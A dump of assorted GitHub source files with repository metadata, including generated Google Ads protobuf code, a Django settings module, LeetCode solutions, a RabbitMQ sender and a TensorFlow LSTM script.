\x01(\x0b\x32\x32.google.ads.googleads.v5.common.YouTubeChannelInfoB\x03\xe0\x41\x05H\x00:\x85\x01\xea\x41\x81\x01\n2googleads.googleapis.com/CustomerNegativeCriterion\x12Kcustomers/{customer}/customerNegativeCriteria/{customer_negative_criterion}B\x0b\n\tcriterionB\x05\n\x03_idB\x8b\x02\n%com.google.ads.googleads.v5.resourcesB\x1e\x43ustomerNegativeCriterionProtoP\x01ZJgoogle.golang.org/genproto/googleapis/ads/googleads/v5/resources;resources\xa2\x02\x03GAA\xaa\x02!Google.Ads.GoogleAds.V5.Resources\xca\x02!Google\\Ads\\GoogleAds\\V5\\Resources\xea\x02%Google::Ads::GoogleAds::V5::Resourcesb\x06proto3'
,
dependencies=[google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v5_dot_proto_dot_enums_dot_criterion__type__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_CUSTOMERNEGATIVECRITERION = _descriptor.Descriptor(
name='CustomerNegativeCriterion',
full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005\372A4\n2googleads.googleapis.com/CustomerNegativeCriterion', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='id', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.id', index=1,
number=10, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.type', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='content_label', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.content_label', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mobile_application', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.mobile_application', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mobile_app_category', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.mobile_app_category', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='placement', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.placement', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='youtube_video', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.youtube_video', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='youtube_channel', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.youtube_channel', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'\352A\201\001\n2googleads.googleapis.com/CustomerNegativeCriterion\022Kcustomers/{customer}/customerNegativeCriteria/{customer_negative_criterion}',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='criterion', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.criterion',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_id', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion._id',
index=1, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=314,
serialized_end=1183,
)
_CUSTOMERNEGATIVECRITERION.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_enums_dot_criterion__type__pb2._CRITERIONTYPEENUM_CRITERIONTYPE
_CUSTOMERNEGATIVECRITERION.fields_by_name['content_label'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2._CONTENTLABELINFO
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_application'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2._MOBILEAPPLICATIONINFO
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_app_category'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2._MOBILEAPPCATEGORYINFO
_CUSTOMERNEGATIVECRITERION.fields_by_name['placement'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2._PLACEMENTINFO
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_video'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2._YOUTUBEVIDEOINFO
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_channel'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2._YOUTUBECHANNELINFO
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['content_label'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['content_label'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion']
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_application'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_application'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion']
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_app_category'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_app_category'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion']
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['placement'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['placement'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion']
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_video'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_video'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion']
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_channel'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_channel'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion']
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['_id'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['id'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['id'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['_id']
DESCRIPTOR.message_types_by_name['CustomerNegativeCriterion'] = _CUSTOMERNEGATIVECRITERION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
CustomerNegativeCriterion = _reflection.GeneratedProtocolMessageType('CustomerNegativeCriterion', (_message.Message,), {
'DESCRIPTOR' : _CUSTOMERNEGATIVECRITERION,
'__module__' : 'google.ads.googleads_v5.proto.resources.customer_negative_criterion_pb2'
,
'__doc__': """A negative criterion for exclusions at the customer level.
Attributes:
resource_name:
Immutable. The resource name of the customer negative
criterion. Customer negative criterion resource names have the
form: ``customers/{customer_id}/customerNegativeCriteria/{cri
terion_id}``
id:
Output only. The ID of the criterion.
type:
Output only. The type of the criterion.
criterion:
The customer negative criterion. Exactly one must be set.
content_label:
Immutable. ContentLabel.
mobile_application:
Immutable. MobileApplication.
mobile_app_category:
Immutable. MobileAppCategory.
placement:
Immutable. Placement.
youtube_video:
Immutable. YouTube Video.
youtube_channel:
Immutable. YouTube Channel.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.resources.CustomerNegativeCriterion)
})
_sym_db.RegisterMessage(CustomerNegativeCriterion)
DESCRIPTOR._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['resource_name']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['id']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['type']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['content_label']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_application']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_app_category']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['placement']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_video']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_channel']._options = None
_CUSTOMERNEGATIVECRITERION._options = None
# @@protoc_insertion_point(module_scope)
| [
"noreply@github.com"
] | noreply@github.com |
98585d037823bca9246c3776455ace23f0a0afed | 0f52b2074afa3f1a99942ad5473da3786bf4f4cf | /distributed_systems/lab1/example/send.py | 9118cd99af10b6d6cc1b8640152c6da821282a30 | [] | no_license | pokachopotun/msu_m118_ivanov | 350a5f9000565a1b3739b6ffcd4ec7c68150cf78 | 2a58e006c174f59b94e2b4582943ebf3adc4a9bd | refs/heads/master | 2022-12-12T22:44:13.440398 | 2020-09-04T10:08:07 | 2020-09-04T10:08:07 | 149,507,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 326 | py | import pika
if __name__ == "__main__":
    # Connect to a RabbitMQ broker on localhost via pika's blocking API.
    connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
    try:
        channel = connection.channel()
        # queue_declare is idempotent; it makes sure 'hello' exists
        # before we publish to it.
        channel.queue_declare(queue='hello')
        # Publish to the default exchange; the routing key selects the
        # queue directly.
        channel.basic_publish(exchange='', routing_key='hello', body='hello_world')
        print("message sent")
    finally:
        # Close the connection even if declaring or publishing raised,
        # so the broker socket is not leaked (the original leaked it on
        # any exception after connecting).
        connection.close()
| [
"mr.salixnew@gmail.com"
] | mr.salixnew@gmail.com |
dfca92b9a02a0b34ddb02223c46fc05f0ac34303 | e35fd52fe4367320024a26f2ee357755b5d5f4bd | /leetcode/problems/434.number-of-segments-in-a-string.py | 229c119643f381afef999ff54714d595c048b7dc | [] | no_license | liseyko/CtCI | a451967b0a0ce108c491d30b81e88d20ad84d2cd | c27f19fac14b4acef8c631ad5569e1a5c29e9e1f | refs/heads/master | 2020-03-21T14:28:47.621481 | 2019-11-12T22:59:07 | 2019-11-12T22:59:07 | 138,658,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 642 | py | #
# @lc app=leetcode id=434 lang=python3
#
# [434] Number of Segments in a String
#
# https://leetcode.com/problems/number-of-segments-in-a-string/description/
#
# algorithms
# Easy (37.34%)
# Total Accepted: 64.1K
# Total Submissions: 171.8K
# Testcase Example: '"Hello, my name is John"'
#
# Count the number of segments in a string, where a segment is defined to be a
# contiguous sequence of non-space characters.
#
# Please note that the string does not contain any non-printable characters.
#
# Example:
#
# Input: "Hello, my name is John"
# Output: 5
#
#
#
class Solution:
    def countSegments(self, s: str) -> int:
        """Return the number of segments in *s*.

        A segment is a maximal run of non-space characters; leading,
        trailing and repeated spaces contribute nothing.
        """
        # str.split() with no argument splits on whitespace runs and
        # drops empty strings, so each element is exactly one segment.
        return len(s.split())
| [
"liseyko@gmail.com"
] | liseyko@gmail.com |
d6acdc7be6d3ca9573b4e644b7cbbb548f5f5d26 | 90aabfcae85240357345ef6def635fc0fa2e990f | /scripts/ComputeFRAC.py | e3f1f4157133266dd8e19bc8b0465dc7011dc5f1 | [] | no_license | kingsfordgroup/sailfish-paper | d612d7be62b25bcc4ec8d74da42fb6a4861869da | b53d2477d6b1312596b72cb3f6ed89d224891f80 | refs/heads/master | 2021-01-19T07:35:32.894403 | 2013-12-13T06:12:31 | 2013-12-13T06:12:31 | 15,155,029 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,188 | py | import sys
import argparse
def main(args):
# The input is assumed to be 3 columns and of the form:
# name length expression
# the last column should be convertable to a float.
exps = None
try:
exps = [ (l.split()[0], float(l.split()[1]), float(l.split()[2])) for l in args.infile]
except ValueError:
print "Could not convert entry in column 2 or 3 to a float"
# The total expression is just the sum of all expressions
tot = sum([e[2] for e in exps])
norm = 1.0 / tot
outfile = args.outfile
# Write the resulting expressed fractions to the output file
for e in exps:
l = float(e[1])
rc = float(e[2])
frac = rc * norm
outfile.write("{}\t{}\t{}\n".format(e[0], l, frac))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Normalize last column of input file to sum to 1")
parser.add_argument('infile', nargs='?', type=argparse.FileType('r'),\
default=sys.stdin)
parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'),\
default=sys.stdout)
args = parser.parse_args()
main(args)
| [
"rob.patro@gmail.com"
] | rob.patro@gmail.com |
981d2629bcdcab88cf240a91cd7b473f19cf401f | 3d8ac3725161b351f98003faa50e6290ef821f0a | /bte_project/btre/settings.py | 27e44b451edf051a27514d84c9bdf551288262ed | [] | no_license | jiachengli1999/learn_django | 5f49506e240766bbe2a05e17edceb3c64990ddac | 893192f577964586eed0fa5ed0442372c5714d88 | refs/heads/master | 2020-06-07T09:07:48.453407 | 2019-01-10T18:22:14 | 2019-01-10T18:22:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,924 | py | from django.contrib.messages import constants as messages
"""
Django settings for btre project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'kv@!$v140x((x2(@!&3jwbni!d29(415_g3&i+r!in3f9q0o(6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
# when creating a new app you need to run python manga.py startapp -appname-
# then add the application to settings
INSTALLED_APPS = [
'pages.apps.PagesConfig',
'listings.apps.ListingsConfig',
'realtors.apps.RealtorsConfig',
'accounts.apps.AccountsConfig',
'contacts.apps.ContactsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'btre.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'btre.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'btre',
'USER': 'postgres',
'HOST': 'localhost'
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'btre/static')
]
# Media folder settings
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
# messages
MESSAGE_TAGS = {
messages.INFO: 'danger'
}
# email config
# EMAIL_HOST = 'smpt.gmail.com'
# EMAIL_PORT = 587
# EMAIL_HOST_USER =
# EMAIL_HOST_PASSWORD =
# EMAIL_USE_TLS = True
| [
"ozalkhan196@gmail.com"
] | ozalkhan196@gmail.com |
3220349f7f91d774a0ba432392d7d9c9850ff482 | 6cb1b63846e818255945cdf1e8faf4f3e353c735 | /venv/datafountain/guangfudianzhan/rnn_model.py | 87c3ca177a47ced431bdc18c4103bd73cbabe8f0 | [] | no_license | LuckyHandsomeCat/deep_learning | 3eb2bec1133f8e547436a8625b40e8bfa8bc7572 | 8c37912069a06a58f80034fe1be7ba5fbc0865d4 | refs/heads/master | 2020-08-08T02:50:10.278517 | 2018-11-30T11:11:34 | 2018-11-30T11:11:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,208 | py | #!/usr/bin/env python3
# -*-coding:utf8 -*-
# @TIME :2018/6/21 下午1:27
# @Author :hwwu
# @File :PricePredictor.py
import codecs
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import pandas as pd
class PricePredictor:
# lstm param
timeStep = 19
hiddenUnitSize = 38 # 隐藏层神经元数量
batchSize = 88 # 每一批次训练多少个样例
inputSize = 19 # 输入维度
outputSize = 1 # 输出维度
lr = 0.0001 # 学习率
train_x, train_y = [], [] # 训练数据集
dataFile = '/Users/liyangyang/Downloads/datafountain/guangdianfute/public.train.csv'
testFile = '/Users/liyangyang/Downloads/datafountain/guangdianfute/public.test.csv'
train_data = []
X = tf.placeholder(tf.float32, [None, timeStep, inputSize])
Y = tf.placeholder(tf.float32, [None, timeStep])
# Y = tf.placeholder(tf.float32, [None, timeStep, outputSize])
weights = {
'in': tf.Variable(tf.random_normal([inputSize, hiddenUnitSize])),
'out': tf.Variable(tf.random_normal([hiddenUnitSize, 1]))
}
biases = {
'in': tf.Variable(tf.constant(0.1, shape=[hiddenUnitSize, ])),
'out': tf.Variable(tf.constant(0.1, shape=[1, ]))
}
savePath = '/Users/liyangyang/PycharmProjects/mypy/venv/datafountain/guangfudianzhan/model/stock.train.model'
def loadData(self):
data = pd.read_csv(self.dataFile)
data = np.array(data)
train_len = len(data)
train = []
for i in range(train_len):
if ((round(data[i][1], 2) != 0.01) | (round(data[i][2], 1) != 0.1)):
if (data[i][2] < -1000):
print(data[i][2])
data[i][2] = -6.0
if (data[i][19] > 360):
data[i][19] -= 360
if (data[i][20] < 0):
data[i][20] = -data[i][20]
train.append(data[i])
print(len(train))
self.train_data = np.array(train)
# 构造数据
def buildTrainDataSet(self):
x_ = self.train_data[:, 1:20]
y_ = self.train_data[:, 20]
for i in range(len(self.train_data) - self.timeStep - 1):
x = x_[i:i + self.timeStep]
y = y_[i:i + self.timeStep]
self.train_x.append(x.tolist())
self.train_y.append(y.tolist())
# lstm算法定义
def lstm(self, batchSize=None):
if batchSize is None:
batchSize = self.batchSize
weightIn = self.weights['in']
biasesIn = self.biases['in']
input = tf.reshape(self.X, [-1, self.inputSize])
inputRnn = tf.matmul(input, weightIn) + biasesIn
inputRnn = tf.reshape(inputRnn, [-1, self.timeStep, self.hiddenUnitSize]) # 将tensor转成3维,作为lstm cell的输入
# cell=tf.nn.rnn_cell.BasicLSTMCell(self.hiddenUnitSize, reuse=True)
# initState=cell.zero_state(batchSize,dtype=tf.float32)
# output_rnn,final_states=tf.nn.dynamic_rnn(cell, inputRnn,initial_state=initState, dtype=tf.float32) #output_rnn是记录lstm每个输出节点的结果,final_states是最后一个cell的结果
# **步骤2:定义一层 LSTM_cell,只需要说明 hidden_size, 它会自动匹配输入的 X 的维度
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(num_units=self.hiddenUnitSize, forget_bias=1.0, state_is_tuple=True)
# **步骤3:添加 dropout layer, 一般只设置 output_keep_prob
# 运行test的时候注释掉这段,不能dropout
lstm_cell = tf.nn.rnn_cell.DropoutWrapper(cell=lstm_cell, input_keep_prob=1.0, output_keep_prob=0.5)
# **步骤4:调用 MultiRNNCell 来实现多层 LSTM
mlstm_cell = tf.nn.rnn_cell.MultiRNNCell([lstm_cell] * 5, state_is_tuple=True)
# **步骤5:用全零来初始化state
init_state = mlstm_cell.zero_state(batchSize, dtype=tf.float32)
output_rnn, final_states = tf.nn.dynamic_rnn(mlstm_cell, inputRnn, initial_state=init_state,
dtype=tf.float32) # output_rnn是记录lstm每个输出节点的结果,final_states是最后一个cell的结果
output = tf.reshape(output_rnn, [-1, self.hiddenUnitSize]) # 作为输出层的输入
w_out = self.weights['out']
b_out = self.biases['out']
pred = tf.matmul(output, w_out) + b_out
return pred, final_states
# 训练模型
def trainLstm(self):
pred, _ = self.lstm()
# 定义损失函数
loss = tf.sqrt(tf.reduce_mean(tf.square(tf.reshape(pred, [-1]) - tf.reshape(self.Y, [-1]))))
# 定义训练模型
train_op = tf.train.AdamOptimizer(self.lr).minimize(loss)
saver = tf.train.Saver(tf.global_variables())
with tf.Session() as sess:
# sess.run(tf.global_variables_initializer())
saver.restore(sess,self.savePath)
# 重复训练100次,训练是一个耗时的过程
for i in range(1000):
step = 0
start = 0
end = start + self.batchSize
while end < len(self.train_x):
_, loss_ = sess.run([train_op, loss], feed_dict={self.X: self.train_x[start:end],
self.Y: self.train_y[start:end]})
# start += 1
start += self.batchSize
end = start + self.batchSize
# 每10步保存一次参数
if step % 500 == 0:
print('test loss is :', i, loss_)
if (i % 10 == 0) & (step % 500 == 0):
print("保存模型")
saver.save(sess, self.savePath)
step += 1
def prediction(self):
pred, _ = self.lstm() # 预测时只输入[1,time_step,inputSize]的测试数据
saver = tf.train.Saver(tf.global_variables())
with tf.Session() as sess:
# 参数恢复
saver.restore(sess, self.savePath)
# 取训练集最后一行为测试样本. shape=[1,time_step,inputSize]
result = []
start = 20
end = start + self.batchSize
# while end < len(self.train_x):
pred = sess.run([pred], feed_dict={self.X: self.train_x[start:end]
})
# 以折线图表示结果
p = np.reshape(pred, [self.batchSize, -1])
s = 0
b = self.timeStep
x = [i for i in range(s, b*19)]
# 以折线图表示结果
plt.figure()
plt.plot(x, p[0], color='r', label='yuce')
plt.plot(x, self.train_y[s:b], color='y', label='shiji')
plt.xlabel("Time(s)") # X轴标签
plt.ylabel("Value") # Y轴标签
plt.show()
predictor = PricePredictor()
predictor.loadData()
# 构建训练数据
predictor.buildTrainDataSet()
# # 模型训练
predictor.trainLstm()
#
# # 预测-预测前需要先完成模型训练
# predictor.prediction()
| [
"wuhongwei@videopls.com"
] | wuhongwei@videopls.com |
d14d8e86f2e15d90eda2d0d0d8abdf5f9dbfa243 | 4c0c9fff693c9af77277347e680cd29881f712e2 | /person_group_delete.py | a144b2abb8cce9614393246c9c6a5a77d8bc7eb8 | [
"MIT"
] | permissive | akash0905/Microsoft_Cognative_service_Face_API | 59bd73e19647d7075ccf32f642bdfe83fd999aac | 24671ffeff1b175372020468ae60dc73908f8582 | refs/heads/master | 2022-12-26T20:52:48.070930 | 2020-10-01T05:55:21 | 2020-10-01T05:55:21 | 300,162,202 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 681 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Dec 30 21:21:10 2019
@author: AKASH DIXIT
"""
import http.client, urllib.request, urllib.parse, urllib.error
subscription_key = 'xxxxxxxxxxxxxxxxxxxxxxxxx'
headers = {
# Request headers
'Ocp-Apim-Subscription-Key':subscription_key
}
params = urllib.parse.urlencode({
})
try:
conn = http.client.HTTPSConnection('centralindia.api.cognitive.microsoft.com')
conn.request("DELETE", "/face/v1.0/persongroups/mangal1?%s" % params, "{body}", headers)
response = conn.getresponse()
data = response.read()
print(data)
conn.close()
except Exception as e:
print("[Errno {0}] {1}".format(e.errno, e.strerror)) | [
"noreply@github.com"
] | noreply@github.com |
3dcb6a3fba7b2c2c8998314caf270f7dc4b3d69c | 824f19d20cdfa26c607db1ff3cdc91f69509e590 | /TopInterviewQuestions/LinkedList/01-Delete-Node.py | e8cc4b8ff1bfc6f65dfa58aa9f76058738818e2a | [] | no_license | almamuncsit/LeetCode | 01d7e32300eebf92ab54c983de6e183242b3c985 | 17aa340649574c37067ec170ceea8d9326be2d6a | refs/heads/master | 2021-07-07T09:48:18.069020 | 2021-03-28T11:26:47 | 2021-03-28T11:26:47 | 230,956,634 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def deleteNode(self, node):
while node.next.next:
node.val = node.next.val
node = node.next
node.val = node.next.val
node.next = None
| [
"msarkar.cse@gmail.com"
] | msarkar.cse@gmail.com |
9390ec85b5042809b379ae4dd1ec5c0551bc8d16 | 00f41859a0deb3e96a7f89c65f904f9c29ff787f | /custom_storages.py | 8f3721c358182b42d75ad40c0d2c27e376fae1fa | [] | no_license | DelroyBrown28/FryedProject | 5d226e7c5cc13a4f90f56c3a57f7ad6c3ae8eadc | 12cb438bcb560499eb43976ec8f4d44759af824a | refs/heads/main | 2023-01-13T10:58:26.396033 | 2020-10-30T20:07:52 | 2020-10-30T20:07:52 | 308,069,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | from django.conf import settings
from storages.backends.s3boto3 import S3Boto3Storage
class StaticStorage(S3Boto3Storage):
location = settings.STATICFILES_LOCATION
class MediaStorage(S3Boto3Storage):
location = settings.MEDIAFILES_LOCATION
| [
"Delroy_jb@hotmail.co.uk"
] | Delroy_jb@hotmail.co.uk |
60c586549370e3fbb1ebd8bbe3f0cd9caba71e15 | 3f29503e6d776ef0914217b1c922f4bc78af4fdd | /13.HASH MAP/1338_Reduce Array Size to The Half_MED/solution.py | 8a43eec458a5c93f42b5aa20c4251801a04035a9 | [] | no_license | kimmyoo/python_leetcode | cd4ff3c4f6d190840bbf5fb9acdca2b92554a6fa | 813235789ce422a3bab198317aafc46fbc61625e | refs/heads/master | 2023-08-16T07:36:38.688871 | 2023-08-15T22:38:00 | 2023-08-15T22:38:00 | 132,544,297 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | class Solution(object):
def minSetSize(self, arr):
"""
:type arr: List[int]
:rtype: int
"""
half = len(arr)/2
d = collections.Counter(arr)
c = d.values()
c.sort(reverse=True)
if max(c) >= half:
return 1
begin, end = 0, 1
sum = max(c)
while True:
sum += c[end]
if sum >= half:
return end+1-begin
else:
end+=1
| [
"kimmyoo@gmail.com"
] | kimmyoo@gmail.com |
58164113ee9263b740a498ee50b571ca868e923c | 1d14e9d0aac0c9a439808c4f765fe1f39bb2c07a | /towhee/tests/mock_operators/cv2_decoder/cv2_decoder.py | 03599b052376c4a28851d8e1e898fa006d72da36 | [
"Apache-2.0"
] | permissive | NbnbZero/towhee | 35b17b0075ea830114224548e151c5c1c39b8e80 | 37e5c82bb139cb056a038ebc9f5723a8adcc954e | refs/heads/main | 2023-08-29T15:20:36.188522 | 2021-10-27T07:34:28 | 2021-10-27T07:34:28 | 385,546,940 | 1 | 0 | Apache-2.0 | 2021-07-13T09:21:15 | 2021-07-13T09:21:15 | null | UTF-8 | Python | false | false | 1,375 | py | # Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
